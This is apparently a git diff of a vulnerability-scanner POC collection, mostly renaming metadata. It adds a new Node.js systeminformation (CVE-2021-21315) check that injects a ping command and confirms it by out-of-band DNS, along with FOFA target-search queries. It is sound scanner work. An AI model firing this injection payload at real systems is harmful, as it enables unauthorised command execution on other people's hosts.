漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/KEDACOM_数字系统接入网关/File_Read/__pycache__/poc.cpython-38.pyc b/poc/KEDACOM_数字系统接入网关/File_Read/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..064c67f Binary files /dev/null and b/poc/KEDACOM_数字系统接入网关/File_Read/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/KEDACOM_数字系统接入网关/File_Read/poc.py b/poc/KEDACOM_数字系统接入网关/File_Read/poc.py index 0bd9ee7..a524753 100644 --- a/poc/KEDACOM_数字系统接入网关/File_Read/poc.py +++ b/poc/KEDACOM_数字系统接入网关/File_Read/poc.py 
@@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "KEDACOM 数字系统接入网关 任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "KEDACOM 数字系统接入网关", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Kingdee_金蝶/Dir_List_server_file/__pycache__/poc.cpython-38.pyc b/poc/Kingdee_金蝶/Dir_List_server_file/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1bb5fc0 Binary files /dev/null and b/poc/Kingdee_金蝶/Dir_List_server_file/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Kingdee_金蝶/Dir_List_server_file/poc.py b/poc/Kingdee_金蝶/Dir_List_server_file/poc.py index 4adef13..1660553 100644 --- a/poc/Kingdee_金蝶/Dir_List_server_file/poc.py +++ b/poc/Kingdee_金蝶/Dir_List_server_file/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "金蝶OA server_file 目录遍历漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "金蝶OA", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Kingdee_金蝶/File_Down_fileDownload_do/__pycache__/poc.cpython-38.pyc b/poc/Kingdee_金蝶/File_Down_fileDownload_do/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4269dea Binary files /dev/null and b/poc/Kingdee_金蝶/File_Down_fileDownload_do/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Kyan/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Kyan/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7d0a712 Binary files /dev/null and b/poc/Kyan/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/Landray_蓝凌OA/File_Read_CNVD_2021_28277/__pycache__/poc.cpython-38.pyc b/poc/Landray_蓝凌OA/File_Read_CNVD_2021_28277/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d9110a2 Binary files /dev/null and b/poc/Landray_蓝凌OA/File_Read_CNVD_2021_28277/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Laravel_Framework/Conf_Info_Disclosure_dot_env/__pycache__/poc.cpython-38.pyc b/poc/Laravel_Framework/Conf_Info_Disclosure_dot_env/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b2545dc Binary files /dev/null and b/poc/Laravel_Framework/Conf_Info_Disclosure_dot_env/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/LiPu_利谱第二代防火墙/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..9b6622f Binary files /dev/null and b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py index a5b1b0b..abee199 100644 --- a/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py +++ b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "利谱第二代防火墙存在信息泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "利谱第二代防火墙", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..344e84c Binary files /dev/null and b/poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ 
diff --git a/poc/MaiPu_迈普/File_Download_webui/__pycache__/poc.cpython-38.pyc b/poc/MaiPu_迈普/File_Download_webui/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..42bd6d6 Binary files /dev/null and b/poc/MaiPu_迈普/File_Download_webui/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MaiPu_迈普/File_Download_webui/poc.py b/poc/MaiPu_迈普/File_Download_webui/poc.py index f7967d6..ce17d7e 100644 --- a/poc/MaiPu_迈普/File_Download_webui/poc.py +++ b/poc/MaiPu_迈普/File_Download_webui/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "迈普 ISG1000安全网关 任意文件下载漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "迈普 ISG1000安全网关", # 漏洞应用名称 "AppVersion" : "None", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/MailGard_佑友/RCE_ping_FireWall/__pycache__/poc.cpython-38.pyc b/poc/MailGard_佑友/RCE_ping_FireWall/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4d5578c Binary files /dev/null and b/poc/MailGard_佑友/RCE_ping_FireWall/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MailGard_佑友/RCE_ping_FireWall/poc.py b/poc/MailGard_佑友/RCE_ping_FireWall/poc.py index e8c57af..2f6cff2 100644 --- a/poc/MailGard_佑友/RCE_ping_FireWall/poc.py +++ b/poc/MailGard_佑友/RCE_ping_FireWall/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "佑友防火墙 后台命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "佑友防火墙", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx 
diff --git a/poc/MailGard_佑友/Weak_Pass_FireWall/__pycache__/poc.cpython-38.pyc b/poc/MailGard_佑友/Weak_Pass_FireWall/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..0508947 Binary files /dev/null and b/poc/MailGard_佑友/Weak_Pass_FireWall/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py b/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py index 20383ba..ad7cfbb 100644 --- a/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py +++ b/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "佑友防火墙 弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "佑友防火墙", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/MessageSolution/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/MessageSolution/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..81b1471 Binary files /dev/null and b/poc/MessageSolution/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Metabase/File_Read_CVE_2021_41277/__pycache__/poc.cpython-38.pyc b/poc/Metabase/File_Read_CVE_2021_41277/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..42e14d4 Binary files /dev/null and b/poc/Metabase/File_Read_CVE_2021_41277/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MicroSoft/RCE_CVE_2022_21907/__pycache__/poc.cpython-38.pyc b/poc/MicroSoft/RCE_CVE_2022_21907/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..320c20f Binary files /dev/null and b/poc/MicroSoft/RCE_CVE_2022_21907/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MicroSoftRCE_CVE_2022_21907/poc.py b/poc/MicroSoft/RCE_CVE_2022_21907/poc.py similarity index 98% rename from poc/MicroSoftRCE_CVE_2022_21907/poc.py rename to poc/MicroSoft/RCE_CVE_2022_21907/poc.py index 446b9b2..fdcf415 100644 
--- a/poc/MicroSoftRCE_CVE_2022_21907/poc.py +++ b/poc/MicroSoft/RCE_CVE_2022_21907/poc.py @@ -10,7 +10,7 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-01", # POC创建时间 "UpdateDate" : "2022-01-01", # POC创建时间 @@ -60,7 +60,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/NSoft_新软/FileRead_EWEBS/__pycache__/poc.cpython-38.pyc b/poc/NSoft_新软/FileRead_EWEBS/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7138310 Binary files /dev/null and b/poc/NSoft_新软/FileRead_EWEBS/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/NatShell_蓝海卓越/File_Read/__pycache__/poc.cpython-38.pyc b/poc/NatShell_蓝海卓越/File_Read/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..afb0468 Binary files /dev/null and b/poc/NatShell_蓝海卓越/File_Read/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/NatShell_蓝海卓越/HashInfo_DisClosure/__pycache__/poc.cpython-38.pyc b/poc/NatShell_蓝海卓越/HashInfo_DisClosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..34f7529 Binary files /dev/null and b/poc/NatShell_蓝海卓越/HashInfo_DisClosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/__pycache__/poc.cpython-38.pyc b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..39fc882 Binary files /dev/null and b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py index 8274040..65bddd0 100644 --- a/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py +++ b/poc/NetPower_中科网威/UPInfo_DisClosure_Firewall/poc.py 
@@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "中科网威 下一代防火墙控制系统 账号密码泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "中科网威 下一代防火墙控制系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Node.js/Cmd_inj_CVE_2021_21315/__pycache__/poc.cpython-38.pyc b/poc/Node.js/Cmd_inj_CVE_2021_21315/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5dcc5c2 Binary files /dev/null and b/poc/Node.js/Cmd_inj_CVE_2021_21315/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Node.js/Cmd_inj_CVE_2021_21315/poc.py b/poc/Node.js/Cmd_inj_CVE_2021_21315/poc.py new file mode 100644 index 0000000..c4f8158 --- /dev/null +++ b/poc/Node.js/Cmd_inj_CVE_2021_21315/poc.py 
@@ -0,0 +1,87 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua,verify_ceye_dns,get_ceye_dns
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2021-06-09", # POC创建时间
+ "UpdateDate" : "2021-06-09", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "Node.js命令注入漏洞(CVE-2021-21315)", # 漏洞名称
+ "VulnID" : "CVE-2021-21315", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "Node.js", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,
+ 它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。
+ 自发布至今,systeminformation软件包下载次数近3400万。
+
+ 2021年02月24日,npm团队发布安全公告,
+ Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315),
+ 其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。
+
+ 目前该漏洞已经在5.3.1版本中修复。
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="Node.js"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ success,dns_flag = get_ceye_dns()
+ if success == False:
+ return [False,dns_flag]
+
+ url = self.target + "/api/getServices?name[]=$({cmd})".format(cmd = "ping%20" + dns_flag) # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ flager = verify_ceye_dns(dns_flag)
+ if flager == True:
+ vuln = [True,dns_flag]
+ elif flager == False:
+ vuln = [False,dns_flag]
+ else:
+ vuln = [False,flager]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if 
self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/Node.js/Dir_Traversal_CVE_2017_14849/__pycache__/poc.cpython-38.pyc b/poc/Node.js/Dir_Traversal_CVE_2017_14849/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8dc5a13 Binary files /dev/null and b/poc/Node.js/Dir_Traversal_CVE_2017_14849/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/OKI/UnAuth_MC573/__pycache__/poc.cpython-38.pyc b/poc/OKI/UnAuth_MC573/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d159a2e Binary files /dev/null and b/poc/OKI/UnAuth_MC573/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MC573/MC573_Unauth_Access/poc.py b/poc/OKI/UnAuth_MC573/poc.py similarity index 81% rename from poc/MC573/MC573_Unauth_Access/poc.py rename to poc/OKI/UnAuth_MC573/poc.py index 05fbc8a..8fba0cb 100644 --- a/poc/MC573/MC573_Unauth_Access/poc.py +++ b/poc/OKI/UnAuth_MC573/poc.py @@ -9,25 +9,26 @@ urllib3.disable_warnings() class POC(POCBase): _info = { - "author" : "hansi", # POC作者 + "author" : "hansi && jijue", # POC作者 "version" : "1", # POC版本,默认是1 "CreateDate" : "2022-01-12", # POC创建时间 "UpdateDate" : "2022-01-12", # POC创建时间 "PocDesc" : """ - 略 + v1:略 + v2:优化了规则,降低误报率 """, # POC描述,写更新描述,没有就不写 - "name" : "MC573未授权访问", # 漏洞名称 + "name" : "OKI MC573未授权访问", # 漏洞名称 "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 - "AppName" : "MC573未授权访问", # 漏洞应用名称 + "AppName" : "MC573", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2022-01-12", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx "VulnDesc" : """ - IKO MC573打印机存在未授权访问漏洞,攻击者可以利用该漏洞访问敏感信息,执行敏感操作 + OKI MC573打印机存在未授权访问漏洞,攻击者可以利用该漏洞访问敏感信息,执行敏感操作 """, # 漏洞简要描述 "fofa-dork":""" - "MC573" + "MC573" """, # fofa搜索语句 "example" : "", # 存在漏洞的演示url,写一个就可以了 "exp_img" : "", # 先不管 
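Review bot: The `_honeypot_check(vuln[1])` call at the end of `_verify` receives `dns_flag` (the OOB token) rather than any response content, because every branch of the detection stores the token in `vuln[1]`; if `_honeypot_check` (defined outside this file) matches on page text, it can never fire here, and the docstring's `[True,html_source]` contract does not match what the function actually returns. Either pass the response body, `if self._honeypot_check(req.text) == True:`, or say in the docstring that for this POC the second element is the DNS token and the honeypot check is not applicable. Minor style points in the same hunk: `except Exception as e: raise e` is just a bare `raise`, `if success == False:` reads better as `if not success:`, and `url_handle` is imported but never used in this file.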
@@ -58,7 +59,7 @@ class POC(POCBase): 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if req.status_code == 200 and "MC573" in req.text: + if req.status_code == 200 and "MC573" in req.text: vuln = [True,req.text] else: vuln = [False,req.text] diff --git a/poc/PHPStudy/Back_Door/__pycache__/poc.cpython-38.pyc b/poc/PHPStudy/Back_Door/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..6c2d5c1 Binary files /dev/null and b/poc/PHPStudy/Back_Door/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/PHPStudy/Back_Door/poc.py b/poc/PHPStudy/Back_Door/poc.py index 6160207..fb7408c 100644 --- a/poc/PHPStudy/Back_Door/poc.py +++ b/poc/PHPStudy/Back_Door/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "PHPStudy 后门检测", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "phpstudy", # 漏洞应用名称 "AppVersion" : "phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/PHPUnit/RCE_eval_stdin/__pycache__/poc.cpython-38.pyc b/poc/PHPUnit/RCE_eval_stdin/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..fdb987c Binary files /dev/null and b/poc/PHPUnit/RCE_eval_stdin/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/PearProject_梨子项目管理系统/Conf_Info_Disclosure_env/__pycache__/poc.cpython-38.pyc b/poc/PearProject_梨子项目管理系统/Conf_Info_Disclosure_env/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..eaa22a0 Binary files /dev/null and b/poc/PearProject_梨子项目管理系统/Conf_Info_Disclosure_env/__pycache__/poc.cpython-38.pyc differ 
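Review bot: The removed and added `if req.status_code == 200 and "MC573" in req.text:` lines in this hunk are textually identical as rendered, so the only visible difference is whitespace, while the PocDesc in the earlier hunk of this file announces a v2 rule change that lowers the false-positive rate. If the condition really did not change, the description overstates the commit; if it did, the change has been lost and should be re-applied. Either way, a 200 response that merely contains the product name is a weak positive signal (vendor manuals and support pages contain it too), so it would help to state in PocDesc what the check now keys on. The enclosing `_verify` starts outside the hunk.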
diff --git a/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/__pycache__/poc.cpython-38.pyc b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..bd69006 Binary files /dev/null and b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/QZSec_齐治/QZSec_齐治AnyUser_Login_Fortress_Machine/poc.py b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/poc.py similarity index 99% rename from poc/QZSec_齐治/QZSec_齐治AnyUser_Login_Fortress_Machine/poc.py rename to poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/poc.py index 32eb643..b7aab1d 100644 --- a/poc/QZSec_齐治/QZSec_齐治AnyUser_Login_Fortress_Machine/poc.py +++ b/poc/QZSec_齐治/AnyUser_Login_Fortress_Machine/poc.py @@ -36,7 +36,9 @@ class POC(POCBase): def _verify(self): """ 返回vuln + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + 不存在漏洞:vuln = [False,""] """ vuln = [False,""] diff --git a/poc/Redis/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Redis/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c02f5ab Binary files /dev/null and b/poc/Redis/Unauth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5ccbb50 Binary files /dev/null and b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py index 7780c58..467d133 100644 --- a/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py +++ b/poc/Ruijie_锐捷/Dir_List_Cloud_ClassRoom/poc.py 
@@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "锐捷云课堂主机 目录遍历漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "锐捷云课堂", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Ruijie_锐捷/File_Read_EG_userAuth/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/File_Read_EG_userAuth/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..98dbf9d Binary files /dev/null and b/poc/Ruijie_锐捷/File_Read_EG_userAuth/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py b/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py index 4441b2c..d6e9b3b 100644 --- a/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py +++ b/poc/Ruijie_锐捷/File_Read_EG_userAuth/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "锐捷EG网关 userAuth.php存在任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "锐捷EG网关", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Ruijie_锐捷/RCE_EWEB_Manager_CNVD_2021_09650/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/RCE_EWEB_Manager_CNVD_2021_09650/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..26627c2 Binary files /dev/null and b/poc/Ruijie_锐捷/RCE_EWEB_Manager_CNVD_2021_09650/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/RCE_NBR_1300G/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/RCE_NBR_1300G/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..dd386ac Binary files /dev/null and b/poc/Ruijie_锐捷/RCE_NBR_1300G/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py b/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py index 4cf1f94..4759da0 100644 
--- a/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py +++ b/poc/Ruijie_锐捷/RCE_NBR_1300G/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "锐捷NBR 1300G 路由器 越权CLI命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "锐捷NBRNBR1300G 路由器", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7509887 Binary files /dev/null and b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py index e068eb9..e9703fd 100644 --- a/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py +++ b/poc/Ruijie_锐捷/RCE_SmartWeb_WEB_VMS/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "锐捷Smartweb管理系统 默认账户➕命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "锐捷网络股份有限公司 无线smartweb管理系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/__pycache__/poc.cpython-38.pyc b/poc/Ruijie_锐捷/UPInfo_DisClosure_RG_UAC_CNVD_2021_14536/__pycache__/poc.cpython-38.pyc new file mode 100644 index 